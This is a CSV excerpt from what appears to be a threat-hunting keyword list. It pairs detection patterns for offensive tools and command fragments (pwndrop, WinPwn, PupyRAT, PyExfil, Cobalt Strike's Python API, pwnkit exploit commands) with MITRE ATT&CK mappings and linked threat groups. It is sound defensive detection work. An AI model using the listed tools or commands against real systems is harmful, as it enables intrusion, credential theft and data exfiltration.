"*PwnDexter/SharpEDRChecker*",".{0,1000}PwnDexter\/SharpEDRChecker.{0,1000}","offensive_tool_keyword","SharpEDRChecker","Checks for the presence of known defensive products such as AV/EDR and logging tools","T1083 - T1518.001 - T1063","TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/PwnDexter/SharpEDRChecker","1","1","N/A","N/A","8","8","706","98","2023-10-09T11:17:49Z","2020-06-16T10:25:00Z","55896"
"*pwndrop install*",".{0,1000}pwndrop\sinstall.{0,1000}","offensive_tool_keyword","pwndrop","Self-deployable file hosting service for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.","T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005","TA0011 - TA0005 - TA0042","N/A","N/A","C2","https://github.com/kgretzky/pwndrop","1","0","N/A","N/A","10","10","2124","267","2023-02-25T05:08:15Z","2019-11-28T19:06:30Z","55897"
"*pwndrop start*",".{0,1000}pwndrop\sstart.{0,1000}","offensive_tool_keyword","pwndrop","Self-deployable file hosting service for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.","T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005","TA0011 - TA0005 - TA0042","N/A","N/A","C2","https://github.com/kgretzky/pwndrop","1","0","N/A","N/A","10","10","2124","267","2023-02-25T05:08:15Z","2019-11-28T19:06:30Z","55898"
"*pwndrop status*",".{0,1000}pwndrop\sstatus.{0,1000}","offensive_tool_keyword","pwndrop","Self-deployable file hosting service for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.","T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005","TA0011 - TA0005 - TA0042","N/A","N/A","C2","https://github.com/kgretzky/pwndrop","1","0","N/A","N/A","10","10","2124","267","2023-02-25T05:08:15Z","2019-11-28T19:06:30Z","55899"
"*pwndrop stop*",".{0,1000}pwndrop\sstop.{0,1000}","offensive_tool_keyword","pwndrop","Self-deployable file hosting service for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.","T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005","TA0011 - TA0005 - TA0042","N/A","N/A","C2","https://github.com/kgretzky/pwndrop","1","0","N/A","N/A","10","10","2124","267","2023-02-25T05:08:15Z","2019-11-28T19:06:30Z","55900"
"*pwndrop-linux-amd64*",".{0,1000}pwndrop\-linux\-amd64.{0,1000}","offensive_tool_keyword","pwndrop","Self-deployable file hosting service for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.","T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005","TA0011 - TA0005 - TA0042","N/A","N/A","C2","https://github.com/kgretzky/pwndrop","1","1","#linux","N/A","10","10","2124","267","2023-02-25T05:08:15Z","2019-11-28T19:06:30Z","55901"
"*pwndrop-master*",".{0,1000}pwndrop\-master.{0,1000}","offensive_tool_keyword","pwndrop","Self-deployable file hosting service for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.","T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005","TA0011 - TA0005 - TA0042","N/A","N/A","C2","https://github.com/kgretzky/pwndrop","1","1","N/A","N/A","10","10","2124","267","2023-02-25T05:08:15Z","2019-11-28T19:06:30Z","55902"
"*pwned_x64/notepad.exe*",".{0,1000}pwned_x64\/notepad\.exe.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","55903"
"*Pwned-creds_Domainpasswordspray.txt*",".{0,1000}Pwned\-creds_Domainpasswordspray\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","55904"
"*pwned-passwords-ntlm*",".{0,1000}pwned\-passwords\-ntlm.{0,1000}","offensive_tool_keyword","ShuckNT","ShuckNT is the script of Shuck.sh online service for on-premise use. It is design to dowgrade - convert - dissect and shuck authentication token based on Data Encryption Standard (DES)","T1552.001 - T1555.003 - T1078.003","TA0006 - TA0002 - TA0040","N/A","N/A","Credential Access","https://github.com/yanncam/ShuckNT","1","1","N/A","N/A","10","1","69","9","2024-10-18T10:45:49Z","2023-01-27T07:52:47Z","55906"
"*pwnkit ""id"" > .mad-root*",".{0,1000}pwnkit\s\""id\""\s\>\s\.mad\-root.{0,1000}","offensive_tool_keyword","Gecko","Gecko Backdoor is a  web php backdoor","T1100 - T1059 - T1105 - T1203","TA0011 - TA0003","N/A","N/A","C2","https://github.com/MadExploits/Gecko","1","0","N/A","N/A","10","10","118","56","2025-02-08T17:50:28Z","2022-07-15T05:51:04Z","55907"
"*pwnkit ""useradd *",".{0,1000}pwnkit\s\""useradd\s.{0,1000}","offensive_tool_keyword","Gecko","Gecko Backdoor is a  web php backdoor","T1100 - T1059 - T1105 - T1203","TA0011 - TA0003","N/A","N/A","C2","https://github.com/MadExploits/Gecko","1","0","N/A","N/A","10","10","118","56","2025-02-08T17:50:28Z","2022-07-15T05:51:04Z","55908"
"*pwnkit *",".{0,1000}pwnkit\s.{0,1000}","offensive_tool_keyword","POC","Exploit for the pwnkit vulnerability (https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt) from the Qualys team","T1068","TA0004","N/A","N/A","Exploitation tool","https://github.com/Ayrx/CVE-2021-4034","1","0","N/A","N/A","N/A","1","93","14","2022-01-27T11:57:05Z","2022-01-26T03:33:47Z","55909"
"*pwnkit64decoded.c*",".{0,1000}pwnkit64decoded\.c.{0,1000}","offensive_tool_keyword","POC","exploitation of CVE-2021-4034","T1210","N/A","N/A","N/A","Exploitation tool","https://github.com/luijait/PwnKit-Exploit","1","1","N/A","N/A","N/A","1","96","14","2022-02-07T15:42:00Z","2022-01-26T18:01:26Z","55910"
"*pwnlook.exe *",".{0,1000}pwnlook\.exe\s.{0,1000}","offensive_tool_keyword","pwnlook","An offensive postexploitation tool that will give you complete control over the Outlook desktop application and therefore to the emails configured in it","T1114 - T1071 - T1059 - T1113 - T1123","TA0002 - TA0005 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/amjcyber/pwnlook","1","0","N/A","N/A","6","2","166","18","2024-10-09T07:50:04Z","2024-09-19T10:26:16Z","55911"
"*pwnlook35.exe *",".{0,1000}pwnlook35\.exe\s.{0,1000}","offensive_tool_keyword","pwnlook","An offensive postexploitation tool that will give you complete control over the Outlook desktop application and therefore to the emails configured in it","T1114 - T1071 - T1059 - T1113 - T1123","TA0002 - TA0005 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/amjcyber/pwnlook","1","0","N/A","N/A","6","2","166","18","2024-10-09T07:50:04Z","2024-09-19T10:26:16Z","55912"
"*pwnlook481.exe *",".{0,1000}pwnlook481\.exe\s.{0,1000}","offensive_tool_keyword","pwnlook","An offensive postexploitation tool that will give you complete control over the Outlook desktop application and therefore to the emails configured in it","T1114 - T1071 - T1059 - T1113 - T1123","TA0002 - TA0005 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/amjcyber/pwnlook","1","0","N/A","N/A","6","2","166","18","2024-10-09T07:50:04Z","2024-09-19T10:26:16Z","55913"
"*pwnsauc3/RWXFinder*",".{0,1000}pwnsauc3\/RWXFinder.{0,1000}","offensive_tool_keyword","rwxfinder","The program uses the Windows API functions to traverse through directories and locate DLL files with RWX section","T1059.001 - T1059.003 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Discovery","https://github.com/pwnsauc3/RWXFinder","1","1","N/A","N/A","5","2","101","14","2023-07-15T15:42:55Z","2023-07-14T07:47:21Z","55914"
"*pwsafe2john.py*",".{0,1000}pwsafe2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","55916"
"*pxethief *",".{0,1000}pxethief\s.{0,1000}","offensive_tool_keyword","pxethief","PXEThief is a set of tooling that can extract passwords from the Operating System Deployment functionality in Microsoft Endpoint Configuration Manager","T1555.004 - T1555.002","TA0006","N/A","N/A","Credential Access","https://github.com/MWR-CyberSec/PXEThief","1","0","N/A","N/A","N/A","4","368","57","2024-05-29T15:07:15Z","2022-08-12T22:16:46Z","55918"
"*pxethief.py*",".{0,1000}pxethief\.py.{0,1000}","offensive_tool_keyword","pxethief","PXEThief is a set of tooling that can extract passwords from the Operating System Deployment functionality in Microsoft Endpoint Configuration Manager","T1555.004 - T1555.002","TA0006","N/A","N/A","Credential Access","https://github.com/MWR-CyberSec/PXEThief","1","1","N/A","N/A","N/A","4","368","57","2024-05-29T15:07:15Z","2022-08-12T22:16:46Z","55919"
"*pxlib\bin\kerberos.x64.o*",".{0,1000}pxlib\\bin\\kerberos\.x64\.o.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","55920"
"*pycobalt.*",".{0,1000}pycobalt\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","55932"
"*pycobalt/aggressor*",".{0,1000}pycobalt\/aggressor.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","55933"
"*pycobalt_debug_on*",".{0,1000}pycobalt_debug_on.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","55934"
"*pycobalt_path*",".{0,1000}pycobalt_path.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","55935"
"*pycobalt_python*",".{0,1000}pycobalt_python.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","55936"
"*pycobalt_timeout*",".{0,1000}pycobalt_timeout.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","55937"
"*pydictor*",".{0,1000}pydictor.{0,1000}","offensive_tool_keyword","pydictor","pydictor  A powerful and useful hacker dictionary builder for a brute-force attack","T1110 - T1111 - T1210 - T1558.004","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/LandGrey/pydictor","1","0","N/A","N/A","N/A","10","3360","642","2024-12-05T02:45:11Z","2016-08-17T08:16:56Z","55938"
"*pyexec -c *",".{0,1000}pyexec\s\-c\s.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","55939"
"*pyexec --file*",".{0,1000}pyexec\s\-\-file.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","55940"
"*PyExec-main.*",".{0,1000}PyExec\-main\..{0,1000}","offensive_tool_keyword","PyExec","This is a very simple privilege escalation technique from admin to System. This is the same technique PSExec uses.","T1134 - T1055 - T1548.002","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/OlivierLaflamme/PyExec","1","1","N/A","N/A","9","1","11","7","2019-09-11T13:56:04Z","2019-09-11T13:54:15Z","55941"
"*pyexfil.Comm.AllJoyn*",".{0,1000}pyexfil\.Comm\.AllJoyn.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","55942"
"*pyexfil.Comm.DNSoTLS.client*",".{0,1000}pyexfil\.Comm\.DNSoTLS\.client.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","55943"
"*pyexfil.Comm.DNSoTLS.server*",".{0,1000}pyexfil\.Comm\.DNSoTLS\.server.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","55944"
"*pyexfil.Comm.GQUIC*",".{0,1000}pyexfil\.Comm\.GQUIC.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","55945"
"*pyexfil.Comm.jetdirect.communicator*",".{0,1000}pyexfil\.Comm\.jetdirect\.communicator.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","55946"
"*pyexfil.Comm.MDNS*",".{0,1000}pyexfil\.Comm\.MDNS.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","55947"
"*pyexfil.Comm.NTP_Body.client*",".{0,1000}pyexfil\.Comm\.NTP_Body\.client.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","55948"
"*pyexfil.Comm.NTP_Body.server*",".{0,1000}pyexfil\.Comm\.NTP_Body\.server.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","55949"
"*pyexfil.HTTPS.https_client*",".{0,1000}pyexfil\.HTTPS\.https_client.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","55950"
"*pyexfil.HTTPS.https_server*",".{0,1000}pyexfil\.HTTPS\.https_server.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","55951"
"*pyexfil.includes.data_generator*",".{0,1000}pyexfil\.includes\.data_generator.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","55952"
"*pyexfil.includes.encryption_wrappers*",".{0,1000}pyexfil\.includes\.encryption_wrappers.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","55953"
"*pyexfil.includes.exceptions*",".{0,1000}pyexfil\.includes\.exceptions.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","55954"
"*pyexfil.includes.general*",".{0,1000}pyexfil\.includes\.general.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","55955"
